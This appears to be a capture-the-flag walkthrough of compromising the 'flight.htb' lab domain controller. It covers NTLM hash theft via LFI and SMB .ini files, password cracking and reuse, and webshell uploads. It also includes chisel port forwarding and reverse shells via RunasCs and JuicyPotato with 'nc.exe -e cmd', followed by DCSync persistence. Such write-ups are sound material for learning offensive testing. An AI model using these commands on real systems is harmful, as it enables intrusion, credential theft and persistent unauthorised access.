The machine is about stealing NTLM hashes via LFI, and SMB afterward theres also some common AD misconfig such as reusable password after you got the user flag you will need to enumerate further and do a user impersonation via runas which is a bit of challenge since theres no rdp or winrm / interactive shell to use. After you gain a shell as C.bum you will have a write access on the inetpub wherein we could use to drop a shell file and lastly for the privesc it would be an SEimpersonate privilege wherein you could use juicypotato to elevate and administrator
running nmap shows 12 ports open and it gives port 88,3268 and 53 which highly indicates that the machine is a domain controller
checking the web it doesnt have any interesting stuffs here and earlier at the nmap it shows flight.htb we could add it into our etc/hosts
doing some subdomain enumeration we got school
checking the page it has a ?view parameter which indicates it could be an lfi
fuzzing for windows lfi it was success. After trying to find some interesting files doesnt lead to anything.
since this is a domain controller we could steal some hashes via lfi. This could also work for sqli and xxe
https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
after we got the hash lets use hashcat -m 5600 hash rockyou.txt to crack the ntlmv2
trying to winrm/rdp doesnt work same thing with psexec and wmiexec
running smbmap shows read only perms on the folder
since this is a DC I will check stuffs on bloodhound to gain a better understanding on how could we get the domain admin
checking for dcsync rights only the DC and admin have rights
while checking the domain users outbound object control i found this user I.francis actually i dont know also why i added it here it just made me laugh upon reading the description
after checking for a while nothing interesting from outbound object control or anything on the groups. The only interesting part here is webdevs group which has 1 user only, despite upon reading the description it has 2 potential users 1 as junior webdev and 1 for senior webdev aside from that if we get this user/group we could probably have a write permission to the web folder and use it to get a shell
another interesting user is L.kein which has a description of pentester there might be some juicy stuffs or remnants of the payloads we could use to escalate the privilege
next thing to consider is kerberoasting to get some hashes.
We could use impacket here or kerbrute but after doing that no luck with it. Since on the bloodhound theres no output for Find AS-REP Roastable Users (DontReqPreAuth) and the only kerberoastable acc is krbtgt
we could use rpcclient and then enumdomusers to create a user list
next is to do a crackmapexec to check on reused password and we got new user which is S.moon
running smbmap shows a write permission on shared, 1 attack we could do here is scf file attack to steal hashes
there are many ways to upload a file on smb we could use
sudo mount -t cifs ‘//flight.htb/Shared’ -o username=S.moon /tmp/1/testmnt
smbmap -H flight.htb -u S.moon -p ‘S@Ss!K@*t13’ — upload test.txt Shared\\testhello
smbclient then you use put <filename>
observing it for a while it shows that the file is being remove this highly indicates that we could abuse this to steal ntlm hash
trying to upload an scf doesnt work and i just realized that because of the extension, uploading files to the smb with a .scf doesnt work and it only accepts some extensions
trying to upload various file extensions .ini works
checking hacktricks .ini file could be use to steal ntlmv2 https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds and after that we crack again the hash
again rdp and winrm doesnt work same with psexec and wmiexec
alternatively we can use smbclient ‘\\flight.htb\Users’ -U C.bum -p ‘Tikkycoll_431012284’ then we go to Desktop and get out user flag
checking for read write we got write permission on web folder
lets upload a php webshell to any of the folder. if we take a look it has index.php listed so a php webshell will work
next is to access the webshell and it seems like we are svc_apache checking for privs we dont have any good permission to escalate
next thing i tried is uploading msfvenom and get a meterpreter session we will be using this to check for exploit_suggester
After trying exploit suggester all of it doesnt work tried also some runas module but nothing works
next is to look for open ports and we can see that port 8000 is open which is interesting since on our nmap it doesnt show and despite its listening with 0.0.0.0 its kinda odd might be some firewall or something
next thing to do is we portforward the port 8000 with chisel
on target machine .\chisel.exe client <attackerip>:<port> R:8000:127.0.0.1:8000
on attacker machine ./chisel server — reverse -p 9999
to check if its successful you can grep port 9999 and 8000 or access the port 8000
checking the website it shows a simple stuff but theres no functionalities in it
After enumerating where the landing page is we found it in inetpub/development. After that i check for write permission and we dont have
next idea was to do some user impersonation to C.bum since he is a senior webdev. We will be doing this via runas but after trying and looking around how we could do this in 1 line it seems like this wont work and we need an interactive shell in order to perform a runas some idea i could think of is create a script or exe file that uses runas command and use nc.exe to give us a shell or we could just find some tools online
after looking around we found https://github.com/antonioCoco/RunasCs
and trying whoami command works
checking for privs it seems like we cant use this user to privesc
checking the github we could get a shell with .\RunasCs.exe C.bum Tikkycoll_431012284 cmd.exe -r <ip>:<port>
checking for write permission it was success and checking on our portforwarded port it also reflects on the web
since it was in the inetpub this would be an aspnet/iis stuffs we could go to seclist and look for aspx webshell
checking for what user we are and priv we got iis and we also have SeImpersonatePrivilege where we could use for escalating our privileges
1 of the reason why i always check for whoami /priv is because some services or user/ service_users requires SeImpersonate to perform administrative level task such as configuring the system also some of it is default upon installation of a program or application
for example if we install GLPI and get a reverseshell theres a chance that we get shell as nt auth\network service
for mssql server application the shell we will be able to get is nt auth\mssql which has a high chance of having a seimpersonate
next thing to do is escalating the privilege. we can upload juicypotato and nc.exe or get a meterpreter session and use getsystem(the easiest way)
next is setup a listener and execute .\juicypotatong.exe -t * -p “C:\windows\System32\cmd.exe” -a “/c c:\xampp\htdocs\school.flight.htb\nc.exe <ip> <port> -e cmd”
after executing the juicypotato we receive shell as nt authority and we could now get the admin flag
1 last thing to do that is to perform a dcsync i know this is not needed on this box but its always good to have persistence on the machine and we could use passthehash here to always authenticate as the administrator
if you are going to do OFFSHORE prolabs having this thing in mind will help you finish the lab and setup your lateral movement easily
